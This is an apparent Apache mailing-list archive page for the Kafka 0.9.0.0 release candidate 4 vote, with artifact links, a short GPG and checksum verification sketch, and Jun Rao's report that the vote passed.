> https://repository.apache.org/content/groups/staging/
>
> * scala-doc
> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/scaladoc/
>
> * java-doc
> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/javadoc/
>
> * The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.0 tag
>
> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=132943b0f83831132cd46ac961cf6f1c00132565
>
> * Documentation
> http://kafka.apache.org/090/documentation.html
>
> /***
>
> Thanks,
>
> Jun
>
>
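
For anyone verifying a release candidate before voting, a typical check
against the KEYS file and the published checksums looks roughly like this (a
sketch; the file names follow the artifact directory above):

# Import the signing keys, then verify the source tarball's signature.
wget http://kafka.apache.org/KEYS
gpg --import KEYS
gpg --verify kafka-0.9.0.0-src.tgz.asc kafka-0.9.0.0-src.tgz
# Compute checksums and compare them against the published
# .md5 / .sha1 / .sha2 files.
md5sum kafka-0.9.0.0-src.tgz
sha1sum kafka-0.9.0.0-src.tgz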


Re: 0.9.0.0 RC4

2015-11-23 Thread Jun Rao
Thanks everyone for voting.

The following are the results of the votes.

+1 binding = 4 votes (Neha Narkhede, Sriharsha Chintalapani, Guozhang Wang,
Jun Rao)
+1 non-binding = 3 votes
-1 = 0 votes
0 = 0 votes

The vote passes.

I will release the artifacts to Maven central and update the dist svn and the
download site. I will send out an announcement after that.

Jun

On Mon, Nov 23, 2015 at 8:46 PM, Jun Rao <j...@confluent.io> wrote:

> +1
>
> Thanks,
>
> Jun
>
> On Fri, Nov 20, 2015 at 5:21 PM, Jun Rao <j...@confluent.io> wrote:
>
>> This is the fourth candidate for release of Apache Kafka 0.9.0.0. This is a
>> major release that includes (1) authentication (through SSL and SASL) and
>> authorization, (2) a new java consumer, (3) a Kafka connect framework for
>> data ingestion and egression, and (4) quotas. Since this is a major
>> release, we will give people a bit more time to try this out.
>>
>> Release Notes for the 0.9.0.0 release
>>
>> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/RELEASE_NOTES.html
>>
>> *** Please download, test and vote by Monday, Nov. 23, 6pm PT
>>
>> Kafka's KEYS file, containing the PGP keys we use to sign the release:
>> http://kafka.apache.org/KEYS. In addition, md5, sha1,
>> and sha2 (SHA256) checksums are provided.
>>
>> * Release artifacts to be voted upon (source and binary):
>> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/
>>
>> * Maven artifacts to be voted upon prior to release:
>> https://repository.apache.org/content/groups/staging/
>>
>> * scala-doc
>> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/scaladoc/
>>
>> * java-doc
>> https://people.apache.org/~junrao/kafka-0.9.0.0-candidate4/javadoc/
>>
>> * The tag to be voted upon (off the 0.9.0 branch) is the 0.9.0.0 tag
>>
>> https://git-wip-us.apache.org/repos/asf?p=kafka.git;a=tag;h=132943b0f83831132cd46ac961cf6f1c00132565
>>
>> * Documentation
>> http://kafka.apache.org/090/documentation.html
>>
>> /***
>>
>> Thanks,
>>
>> Jun
>>
>>
>


  1   2   3   4   5   6   7   8   9   10   >